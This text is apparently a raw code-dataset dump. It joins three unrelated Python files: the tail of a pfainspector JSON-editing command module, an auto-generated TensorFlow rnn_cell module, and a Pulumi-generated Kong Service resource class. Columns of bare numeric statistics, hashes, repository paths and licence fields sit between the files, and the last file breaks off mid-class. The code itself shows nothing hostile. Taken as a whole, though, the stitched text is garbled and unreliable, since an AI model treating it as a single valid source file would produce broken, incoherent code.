proc.stdin.write(content)
except IOError as err:
if str(err) != "[Errno 32] Broken pipe":
raise
pipewait(proc)
class ChangeCommand(Command):
"""The 'json change' command in pfainspector."""
def __init__(self, mode):
self.name = "change"
self.syntax = "change <name> <pattern> to <replacement>"
self.help = "replace instances in a PFA document or subexpression that match a regular expression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles.keys() if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
elif len(words) == 2 and isinstance(words[0], (parser.Word, parser.Extract)) and words[0].text in self.mode.pfaFiles:
return ["to "]
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
if len(args) == 4 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
model = self.mode.pfaFiles[args[0].text]
node = model.obj
safecopy = copy.deepcopy(node)
def rollback():
self.mode.pfaFiles[args[0].text].obj = safecopy
regex = args[1].regex()
replacement = args[3].replacement()
elif len(args) == 4 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
model = self.mode.pfaFiles[args[0].text]
node = model.obj
safecopy = copy.deepcopy(node)
def rollback():
self.mode.pfaFiles[args[0].text].obj = safecopy
items = args[0].items
node = extaction(args[0], node, items)
regex = args[1].regex()
replacement = args[3].replacement()
else:
self.syntaxError()
def display(i):
if isinstance(i, basestring):
if " " in i:
return json.dumps(i)
else:
return i
else:
return str(i)
def replace(value, groups):
if isinstance(value, parser.Replacement):
try:
return groups[value.name]
except KeyError:
raise InspectorError("group ({0}) not found in regular expression".format(value.name))
elif isinstance(value, dict):
return dict((k, replace(v, groups)) for k, v in value.items())
elif isinstance(value, (list, tuple)):
return [replace(x, groups) for x in value]
else:
return value
def removeAts(obj):
if isinstance(obj, dict):
return dict((k, removeAts(v)) for k, v in obj.items() if k != "@")
elif isinstance(obj, (list, tuple)):
return [removeAts(x) for x in obj]
else:
return obj
ask = True
self.mode.pause()
try:
for index, match in t.search(regex, node):
replacedReplacement = replace(replacement, match.groups)
if ask:
print "At index [" + ", ".join(display(i) for i in index) + "]:"
print "Original: " + json.dumps(removeAts(t.get(node, index)))
print "Change to: " + json.dumps(replacedReplacement)
action = None
while action is None:
response = raw_input("(Y/n/all/stop/revert): ")
normalized = response.strip().lower()
if normalized in ("", "y", "yes"):
action = "yes"
elif normalized in ("n", "no"):
action = "no"
elif normalized == "all":
action = "all"
elif normalized == "stop":
action = "stop"
elif normalized == "revert":
action = "revert"
print
else:
action = "yes"
if action == "yes":
t.assign(node, index, replacedReplacement)
elif action == "all":
t.assign(node, index, replacedReplacement)
ask = False
elif action == "stop":
break
elif action == "revert":
rollback()
break
except:
rollback()
self.mode.resume()
raise
else:
model.reset()
self.mode.resume()
class JsonGadget(Gadget):
"""The 'json' gadget in pfainspector."""
def __init__(self, mode):
self.commandGroup = CommandGroup("json", [
LookCommand(mode),
CountCommand(mode),
IndexCommand(mode),
FindCommand(mode),
ChangeCommand(mode)
])
| 40.136738
| 145
| 0.531092
| 2,772
| 24,363
| 4.65873
| 0.106061
| 0.026715
| 0.053276
| 0.03624
| 0.766765
| 0.754762
| 0.748025
| 0.737184
| 0.727195
| 0.700403
| 0
| 0.014049
| 0.357263
| 24,363
| 606
| 146
| 40.20297
| 0.810652
| 0.030374
| 0
| 0.722922
| 0
| 0
| 0.103654
| 0.001103
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.012594
| null | null | 0.042821
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c412899c03b81c1f041a7664177a8afb9f2893e
| 1,198
|
py
|
Python
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/nn/rnn_cell/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 2
|
2019-08-04T20:28:14.000Z
|
2019-10-27T23:26:42.000Z
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/nn/rnn_cell/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | null | null | null |
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/nn/rnn_cell/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 1
|
2020-11-04T03:16:29.000Z
|
2020-11-04T03:16:29.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Module for constructing RNN Cells.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.ops.rnn_cell_impl import BasicLSTMCell
from tensorflow.python.ops.rnn_cell_impl import BasicRNNCell
from tensorflow.python.ops.rnn_cell_impl import DeviceWrapper
from tensorflow.python.ops.rnn_cell_impl import DropoutWrapper
from tensorflow.python.ops.rnn_cell_impl import GRUCell
from tensorflow.python.ops.rnn_cell_impl import LSTMCell
from tensorflow.python.ops.rnn_cell_impl import LSTMStateTuple
from tensorflow.python.ops.rnn_cell_impl import MultiRNNCell
from tensorflow.python.ops.rnn_cell_impl import RNNCell
from tensorflow.python.ops.rnn_cell_impl import ResidualWrapper
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "compat.v1.nn.rnn_cell", public_apis=None, deprecation=False,
has_lite=False)
| 41.310345
| 91
| 0.840568
| 171
| 1,198
| 5.555556
| 0.350877
| 0.202105
| 0.231579
| 0.242105
| 0.524211
| 0.524211
| 0.524211
| 0.524211
| 0.103158
| 0
| 0
| 0.000919
| 0.09182
| 1,198
| 28
| 92
| 42.785714
| 0.872243
| 0.134391
| 0
| 0
| 1
| 0
| 0.020408
| 0.020408
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.722222
| 0
| 0.722222
| 0.111111
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a773b4d66c44bb9a3985707203b0e93bb7afdbc8
| 29,268
|
py
|
Python
|
sdk/python/pulumi_kong/service.py
|
pulumi/pulumi-kong
|
775c17e4eac38934252410ed3dcdc6fc3bd40c5c
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-02-23T10:05:20.000Z
|
2020-05-15T14:22:10.000Z
|
sdk/python/pulumi_kong/service.py
|
pulumi/pulumi-kong
|
775c17e4eac38934252410ed3dcdc6fc3bd40c5c
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2020-04-21T22:04:23.000Z
|
2022-03-31T15:29:53.000Z
|
sdk/python/pulumi_kong/service.py
|
pulumi/pulumi-kong
|
775c17e4eac38934252410ed3dcdc6fc3bd40c5c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ServiceArgs', 'Service']
@pulumi.input_type
class ServiceArgs:
def __init__(__self__, *,
protocol: pulumi.Input[str],
ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_certificate_id: Optional[pulumi.Input[str]] = None,
connect_timeout: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
read_timeout: Optional[pulumi.Input[int]] = None,
retries: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tls_verify: Optional[pulumi.Input[bool]] = None,
tls_verify_depth: Optional[pulumi.Input[int]] = None,
write_timeout: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Service resource.
"""
pulumi.set(__self__, "protocol", protocol)
if ca_certificate_ids is not None:
pulumi.set(__self__, "ca_certificate_ids", ca_certificate_ids)
if client_certificate_id is not None:
pulumi.set(__self__, "client_certificate_id", client_certificate_id)
if connect_timeout is not None:
pulumi.set(__self__, "connect_timeout", connect_timeout)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if path is not None:
pulumi.set(__self__, "path", path)
if port is not None:
pulumi.set(__self__, "port", port)
if read_timeout is not None:
pulumi.set(__self__, "read_timeout", read_timeout)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tls_verify is not None:
pulumi.set(__self__, "tls_verify", tls_verify)
if tls_verify_depth is not None:
pulumi.set(__self__, "tls_verify_depth", tls_verify_depth)
if write_timeout is not None:
pulumi.set(__self__, "write_timeout", write_timeout)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="caCertificateIds")
def ca_certificate_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "ca_certificate_ids")
@ca_certificate_ids.setter
def ca_certificate_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ca_certificate_ids", value)
@property
@pulumi.getter(name="clientCertificateId")
def client_certificate_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "client_certificate_id")
@client_certificate_id.setter
def client_certificate_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_certificate_id", value)
@property
@pulumi.getter(name="connectTimeout")
def connect_timeout(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "connect_timeout")
@connect_timeout.setter
def connect_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connect_timeout", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="readTimeout")
def read_timeout(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "read_timeout")
@read_timeout.setter
def read_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_timeout", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tlsVerify")
def tls_verify(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "tls_verify")
@tls_verify.setter
def tls_verify(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "tls_verify", value)
@property
@pulumi.getter(name="tlsVerifyDepth")
def tls_verify_depth(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "tls_verify_depth")
@tls_verify_depth.setter
def tls_verify_depth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tls_verify_depth", value)
@property
@pulumi.getter(name="writeTimeout")
def write_timeout(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "write_timeout")
@write_timeout.setter
def write_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_timeout", value)
@pulumi.input_type
class _ServiceState:
def __init__(__self__, *,
ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_certificate_id: Optional[pulumi.Input[str]] = None,
connect_timeout: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
read_timeout: Optional[pulumi.Input[int]] = None,
retries: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tls_verify: Optional[pulumi.Input[bool]] = None,
tls_verify_depth: Optional[pulumi.Input[int]] = None,
write_timeout: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Service resources.
"""
if ca_certificate_ids is not None:
pulumi.set(__self__, "ca_certificate_ids", ca_certificate_ids)
if client_certificate_id is not None:
pulumi.set(__self__, "client_certificate_id", client_certificate_id)
if connect_timeout is not None:
pulumi.set(__self__, "connect_timeout", connect_timeout)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if path is not None:
pulumi.set(__self__, "path", path)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if read_timeout is not None:
pulumi.set(__self__, "read_timeout", read_timeout)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tls_verify is not None:
pulumi.set(__self__, "tls_verify", tls_verify)
if tls_verify_depth is not None:
pulumi.set(__self__, "tls_verify_depth", tls_verify_depth)
if write_timeout is not None:
pulumi.set(__self__, "write_timeout", write_timeout)
@property
@pulumi.getter(name="caCertificateIds")
def ca_certificate_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "ca_certificate_ids")
@ca_certificate_ids.setter
def ca_certificate_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ca_certificate_ids", value)
@property
@pulumi.getter(name="clientCertificateId")
def client_certificate_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "client_certificate_id")
@client_certificate_id.setter
def client_certificate_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_certificate_id", value)
@property
@pulumi.getter(name="connectTimeout")
def connect_timeout(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "connect_timeout")
@connect_timeout.setter
def connect_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connect_timeout", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="readTimeout")
def read_timeout(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "read_timeout")
@read_timeout.setter
def read_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_timeout", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tlsVerify")
def tls_verify(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "tls_verify")
@tls_verify.setter
def tls_verify(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "tls_verify", value)
@property
@pulumi.getter(name="tlsVerifyDepth")
def tls_verify_depth(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "tls_verify_depth")
@tls_verify_depth.setter
def tls_verify_depth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tls_verify_depth", value)
@property
@pulumi.getter(name="writeTimeout")
def write_timeout(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "write_timeout")
@write_timeout.setter
def write_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_timeout", value)
class Service(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_certificate_id: Optional[pulumi.Input[str]] = None,
connect_timeout: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
read_timeout: Optional[pulumi.Input[int]] = None,
retries: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tls_verify: Optional[pulumi.Input[bool]] = None,
tls_verify_depth: Optional[pulumi.Input[int]] = None,
write_timeout: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
## # Service
The service resource maps directly onto the json for the service endpoint in Kong. For more information on the parameters [see the Kong Service create documentation](https://docs.konghq.com/gateway-oss/2.5.x/admin-api/#service-object).
## Example Usage
```python
import pulumi
import pulumi_kong as kong
service = kong.Service("service",
connect_timeout=1000,
host="test.org",
path="/mypath",
port=8080,
protocol="http",
read_timeout=3000,
retries=5,
write_timeout=2000)
```
To use a client certificate and ca certificates combine with certificate resource (note protocol must be `https`):
```python
import pulumi
import pulumi_kong as kong
certificate = kong.Certificate("certificate",
certificate=\"\"\" -----BEGIN CERTIFICATE-----
......
-----END CERTIFICATE-----
\"\"\",
private_key=\"\"\" -----BEGIN PRIVATE KEY-----
.....
-----END PRIVATE KEY-----
\"\"\",
snis=["foo.com"])
ca = kong.Certificate("ca",
certificate=\"\"\" -----BEGIN CERTIFICATE-----
......
-----END CERTIFICATE-----
\"\"\",
private_key=\"\"\" -----BEGIN PRIVATE KEY-----
.....
-----END PRIVATE KEY-----
\"\"\",
snis=["ca.com"])
service = kong.Service("service",
protocol="https",
host="test.org",
tls_verify=True,
tls_verify_depth=2,
client_certificate_id=certificate.id,
ca_certificate_ids=[ca.id])
```
## Argument reference
* `name` - (Required) Service name
* `protocol` - (Required) Protocol to use
* `host` - (Optional) Host to map to
* `port` - (Optional, int) Port to map to. Default: 80
* `path` - (Optional) Path to map to
* `retries` - (Optional, int) Number of retries. Default: 5
* `connect_timeout` - (Optional, int) Connection timeout. Default(ms): 60000
* `write_timeout` - (Optional, int) Write timout. Default(ms): 60000
* `read_timeout` - (Optional, int) Read timeout. Default(ms): 60000
* `tags` - (Optional) A list of strings associated with the Service for grouping and filtering.
* `client_certificate_id` - (Optional) ID of Certificate to be used as client certificate while TLS handshaking to the upstream server. Use ID from `Certificate` resource
* `tls_verify` - (Optional) Whether to enable verification of upstream server TLS certificate. If not set then the nginx default is respected.
* `tls_verify_depth` - (Optional) Maximum depth of chain while verifying Upstream server’s TLS certificate.
* `ca_certificate_ids` - (Optional) A of CA Certificate IDs (created from the certificate resource). that are used to build the trust store while verifying upstream server’s TLS certificate.
## Import
To import a service
```sh
$ pulumi import kong:index/service:Service <service_identifier> <service_id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServiceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## # Service
The service resource maps directly onto the json for the service endpoint in Kong. For more information on the parameters [see the Kong Service create documentation](https://docs.konghq.com/gateway-oss/2.5.x/admin-api/#service-object).
## Example Usage
```python
import pulumi
import pulumi_kong as kong
service = kong.Service("service",
connect_timeout=1000,
host="test.org",
path="/mypath",
port=8080,
protocol="http",
read_timeout=3000,
retries=5,
write_timeout=2000)
```
To use a client certificate and ca certificates combine with certificate resource (note protocol must be `https`):
```python
import pulumi
import pulumi_kong as kong
certificate = kong.Certificate("certificate",
certificate=\"\"\" -----BEGIN CERTIFICATE-----
......
-----END CERTIFICATE-----
\"\"\",
private_key=\"\"\" -----BEGIN PRIVATE KEY-----
.....
-----END PRIVATE KEY-----
\"\"\",
snis=["foo.com"])
ca = kong.Certificate("ca",
certificate=\"\"\" -----BEGIN CERTIFICATE-----
......
-----END CERTIFICATE-----
\"\"\",
private_key=\"\"\" -----BEGIN PRIVATE KEY-----
.....
-----END PRIVATE KEY-----
\"\"\",
snis=["ca.com"])
service = kong.Service("service",
protocol="https",
host="test.org",
tls_verify=True,
tls_verify_depth=2,
client_certificate_id=certificate.id,
ca_certificate_ids=[ca.id])
```
## Argument reference
* `name` - (Required) Service name
* `protocol` - (Required) Protocol to use
* `host` - (Optional) Host to map to
* `port` - (Optional, int) Port to map to. Default: 80
* `path` - (Optional) Path to map to
* `retries` - (Optional, int) Number of retries. Default: 5
* `connect_timeout` - (Optional, int) Connection timeout. Default(ms): 60000
* `write_timeout` - (Optional, int) Write timout. Default(ms): 60000
* `read_timeout` - (Optional, int) Read timeout. Default(ms): 60000
* `tags` - (Optional) A list of strings associated with the Service for grouping and filtering.
* `client_certificate_id` - (Optional) ID of Certificate to be used as client certificate while TLS handshaking to the upstream server. Use ID from `Certificate` resource
* `tls_verify` - (Optional) Whether to enable verification of upstream server TLS certificate. If not set then the nginx default is respected.
* `tls_verify_depth` - (Optional) Maximum depth of chain while verifying Upstream server’s TLS certificate.
* `ca_certificate_ids` - (Optional) A of CA Certificate IDs (created from the certificate resource). that are used to build the trust store while verifying upstream server’s TLS certificate.
## Import
To import a service
```sh
$ pulumi import kong:index/service:Service <service_identifier> <service_id>
```
:param str resource_name: The name of the resource.
:param ServiceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServiceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_certificate_id: Optional[pulumi.Input[str]] = None,
connect_timeout: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
read_timeout: Optional[pulumi.Input[int]] = None,
retries: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tls_verify: Optional[pulumi.Input[bool]] = None,
tls_verify_depth: Optional[pulumi.Input[int]] = None,
write_timeout: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServiceArgs.__new__(ServiceArgs)
__props__.__dict__["ca_certificate_ids"] = ca_certificate_ids
__props__.__dict__["client_certificate_id"] = client_certificate_id
__props__.__dict__["connect_timeout"] = connect_timeout
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["path"] = path
__props__.__dict__["port"] = port
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["read_timeout"] = read_timeout
__props__.__dict__["retries"] = retries
__props__.__dict__["tags"] = tags
__props__.__dict__["tls_verify"] = tls_verify
__props__.__dict__["tls_verify_depth"] = tls_verify_depth
__props__.__dict__["write_timeout"] = write_timeout
super(Service, __self__).__init__(
'kong:index/service:Service',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_certificate_id: Optional[pulumi.Input[str]] = None,
connect_timeout: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
read_timeout: Optional[pulumi.Input[int]] = None,
retries: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tls_verify: Optional[pulumi.Input[bool]] = None,
tls_verify_depth: Optional[pulumi.Input[int]] = None,
write_timeout: Optional[pulumi.Input[int]] = None) -> 'Service':
"""
Get an existing Service resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceState.__new__(_ServiceState)
__props__.__dict__["ca_certificate_ids"] = ca_certificate_ids
__props__.__dict__["client_certificate_id"] = client_certificate_id
__props__.__dict__["connect_timeout"] = connect_timeout
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["path"] = path
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["read_timeout"] = read_timeout
__props__.__dict__["retries"] = retries
__props__.__dict__["tags"] = tags
__props__.__dict__["tls_verify"] = tls_verify
__props__.__dict__["tls_verify_depth"] = tls_verify_depth
__props__.__dict__["write_timeout"] = write_timeout
return Service(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="caCertificateIds")
def ca_certificate_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "ca_certificate_ids")
@property
@pulumi.getter(name="clientCertificateId")
def client_certificate_id(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "client_certificate_id")
@property
@pulumi.getter(name="connectTimeout")
def connect_timeout(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "connect_timeout")
@property
@pulumi.getter
def host(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "host")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def path(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "path")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="readTimeout")
def read_timeout(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "read_timeout")
@property
@pulumi.getter
def retries(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "retries")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "tags")
@property
